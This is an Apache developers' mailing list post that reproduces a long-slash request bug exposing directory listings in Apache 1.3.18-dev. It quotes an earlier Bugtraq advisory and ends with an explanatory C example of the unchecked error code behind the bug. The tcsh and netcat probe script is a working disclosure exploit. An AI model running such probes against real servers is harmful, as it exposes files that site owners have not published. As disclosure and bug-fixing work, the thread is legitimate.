httpd-dev mailing list archives

From Martin Kraemer <Martin.Krae...@Fujitsu-Siemens.com>
Subject [SECURITY] Apache-1.3.18
Date Fri, 09 Feb 2001 08:45:35 GMT
I just went through old mails and tested this (see excerpt at end)
on the current apache 1.3.18-dev.

And guess what: The error is still there!!!!!
And I could reproduce it on both FreeBSD-4.2 and BS2000/SVR4.

I have a shell script called GET (linked to HEAD):

--snip--
#!/bin/sh
# on localhost:81, I have a proxy running:
# The HTTP method is taken from the script's own name (GET, or HEAD via the
# symlink) and the URL from the first argument; the empty line before the
# "." terminator is the blank line that ends the request headers.
nc localhost 81 <<.
`basename $0` $1 HTTP/1.0

.
--snip--

and I tried this:
---------------
#!/bin/tcsh -f
# Probe the proxied server with an ever-growing run of "/" characters.
set x=/
set host=deejai.mch.fsc.net:8080
# Phase 1: add slashes until the response body contains "////", i.e. until
# the server stops serving index.html and returns an automatic directory
# listing (whose parent-directory HREF echoes the slashes back).
while ( 1 )
  echo -n /
  GET http://${host}$x | grep //// && break
  set x=$x/
end
# Phase 2: keep adding slashes until the server answers 403 Forbidden.
while ( 1 )
  echo -n Number of slashes:
  echo -n $x | wc -c
  GET http://${host}$x | grep 403 && break
  set x=$x/
end
---------------

At 993 '/'s, I still got index.html.en
At 994, I got a directory listing:
---------------
HTTP/1.0 200 OK
Date: Fri, 09 Feb 2001 08:22:10 GMT
Server: Apache/1.3.18-dev (BS2000)
Content-Type: text/html
X-Cache: MISS from deejai2.mch.fsc.net
Proxy-Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
 <HEAD>
  <TITLE>Index of /</TITLE>
 </HEAD>
 <BODY>
<H1>Index of /</H1>
<PRE><IMG SRC="/icons/blank.gif" ALT="     "> <A HREF="?N=D">Name</A>
                   <A HREF="?M=A">Last modified</A>       <A HREF="?S=A">Size</A>
 <A HREF="?D=A">Description</A>
<HR>
<IMG SRC="/icons/back.gif" ALT="[DIR]"> <A HREF="//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
<IMG SRC="/icons/image2.gif" ALT="[IMG]"> <A HREF="apache_pb.gif">apache_pb.gif</A>
          07-Feb-2001 16:05     2k  
<IMG SRC="/icons/text.gif" ALT="[TXT]"> <A HREF="index.html.ca">index.html.ca</A>
          07-Feb-2001 16:05     2k  
<IMG SRC="/icons/text.gif" ALT="[TXT]"> <A HREF="index.html.cz">index.html.cz</A>
          07-Feb-2001 16:05     2k  
<IMG SRC="/icons/text.gif" ALT="[TXT]"> <A HREF="index.html.de">index.html.de</A>
          07-Feb-2001 16:05     2k  
....
---------------

And at 997 and beyond, I got this:

---------------
HTTP/1.0 403 Forbidden
Date: Fri, 09 Feb 2001 08:25:06 GMT
Server: Apache/1.3.18-dev (BS2000)
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from deejai2.mch.fsc.net
Proxy-Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>403 Forbidden</TITLE>
</HEAD><BODY>
<H1>Forbidden</H1>
You don't have permission to access /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////[truncated
by my editor]
on this server.<P>
<HR>
<ADDRESS>Apache/1.3.18-dev Server at dcWWW.mch.fsc.net Port 8080</ADDRESS>
</BODY></HTML>
---------------

   Martin

> On Wed, 31 May 2000, Marc Slemko wrote:
> 
> > FYI.
> > 
> > It may or may not apply to Apache itself on Win32, and may or may not be
> > fixed in current versions.  What is happening here is almost certainly
> > that it tries to look for index.html, etc. and the error code isn't
> > properly interpreted to mean "that is too long, so bail".
> > 
> > ---------- Forwarded message ----------
> > Date: Wed, 31 May 2000 18:34:30 -0000
> > From: Marek Roy <marek_roy@HOTMAIL.COM>
> > To: BUGTRAQ@SECURITYFOCUS.COM
> > Subject: IBM HTTP SERVER / APACHE
> > 
> > I haven't seen any advisories for IBM HTTP SERVER running 
> > Apache.
> > 
> > There is a crucial number of "/" (forward slash) you can 
> > use to retrieve the contents of the root directory of this 
> > particular Web Server.  Using this vulnerability, you can 
> > retrieve any files or scripts running from that directory 
> > and sub-directories.
> > 
> > The number of "/" used to reproduce this can be different 
> > from one server to another.  I don't have enough time to do 
> > more testing.  However, feel free to add some more info to 
> > this quick advisory.
> > 
> > You can get a trial copy at:
> > 
> > http://www-4.ibm.com/software/webservers/httpservers/download.html#v136
> > 
> > ====
> > 
> > Vulnerable:
> > Server: IBM_HTTP_Server/1.3.6.2 Apache/1.3.7-dev (Win32)
> > 
> > Not Vulnerable:
> > Server: IBM_HTTP_Server/1.3.6.2 Apache/1.3.7-dev (Unix)
> > 
> > ====
> > 
> > If you send a GET request of 210 "/", you get:
> > The actual Web Page.
> > ----
> > If you send a GET request of 211 "/", you get:
> > Index of /
> > -----
> > If you send a GET request of 212 "/", you get:
> > 
> > Forbidden
> > You don't have permission to access
> > "/" x 212 on this server.
> > 
> > 
> > Marek Roy
-- 
<Martin.Kraemer@Fujitsu-Siemens.com>    |       Fujitsu Siemens
       <martin@apache.org>              |   81730  Munich,  Germany
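Marc Slemko's forwarded note attributes the listing to an index-file lookup whose error code is not checked for "path too long". The C program below is an added illustration of that failure mode, written for this page and not taken from Apache or IBM HTTP Server: naive_index_lookup() treats every stat() failure as "no index file here", so a request whose path exceeds the kernel's limit falls through to a directory listing, while strict_index_lookup() only falls through on ENOENT/ENOTDIR and refuses anything else, ENAMETOOLONG included. The document root ("/"), the index file name, the slash counts and the assumption that the test system's PATH_MAX is below 8192 are the example's own, not values from the thread.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>

/* Outcome of an index-file lookup, modelled on the three responses seen in
 * the thread: the index page, an automatic directory listing, or 403. */
enum lookup_result { SERVE_INDEX, FALL_BACK_TO_LISTING, REFUSE_REQUEST };

/* Build "<docroot>" + nslashes x "/" + "<index>" on the heap (caller frees).
 * The run of slashes mimics the request URIs used in the probe above. */
static char *build_path(const char *docroot, size_t nslashes, const char *index)
{
    size_t dlen = strlen(docroot);
    char *p = malloc(dlen + nslashes + strlen(index) + 1);
    if (!p)
        return NULL;
    memcpy(p, docroot, dlen);
    memset(p + dlen, '/', nslashes);
    strcpy(p + dlen + nslashes, index);
    return p;
}

/* Naive lookup: any stat() failure is read as "index file absent", so the
 * request falls through to a directory listing. This is the hypothesised
 * bug: ENAMETOOLONG is treated exactly like ENOENT. */
enum lookup_result naive_index_lookup(const char *docroot, size_t nslashes, const char *index)
{
    struct stat st;
    char *p = build_path(docroot, nslashes, index);
    if (!p)
        return REFUSE_REQUEST;
    int rc = stat(p, &st);
    free(p);
    return rc == 0 ? SERVE_INDEX : FALL_BACK_TO_LISTING;
}

/* Hardened lookup: only ENOENT and ENOTDIR mean "not there". Anything else
 * (ENAMETOOLONG, EACCES, ELOOP, ...) is an error in the request or the
 * server's state and is refused rather than turned into a listing. */
enum lookup_result strict_index_lookup(const char *docroot, size_t nslashes, const char *index)
{
    struct stat st;
    char *p = build_path(docroot, nslashes, index);
    if (!p)
        return REFUSE_REQUEST;
    int rc = stat(p, &st);
    int err = errno;           /* capture before anything can clobber it */
    free(p);
    if (rc == 0)
        return SERVE_INDEX;
    if (err == ENOENT || err == ENOTDIR)
        return FALL_BACK_TO_LISTING;
    return REFUSE_REQUEST;
}

static const char *name(enum lookup_result r)
{
    return r == SERVE_INDEX ? "index" : r == FALL_BACK_TO_LISTING ? "listing" : "403";
}

int main(void)
{
    /* Constructed inputs: a docroot that always exists and an index file
     * name that does not; 8192 slashes exceed PATH_MAX on Linux and BSD. */
    const char *idx = "no-such-index.constructed.html";
    printf("naive,  3 slashes:    %s\n", name(naive_index_lookup("/", 3, idx)));
    printf("naive,  8192 slashes: %s\n", name(naive_index_lookup("/", 8192, idx)));
    printf("strict, 3 slashes:    %s\n", name(strict_index_lookup("/", 3, idx)));
    printf("strict, 8192 slashes: %s\n", name(strict_index_lookup("/", 8192, idx)));
    return 0;
}
```

The point of the comparison is the errno branch: a too-long path is not "file missing", and a handler that cannot tell the two apart converts a kernel limit into an information disclosure, which is what the slash counts in the thread (211 on Win32, 994 on BS2000) are measuring.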
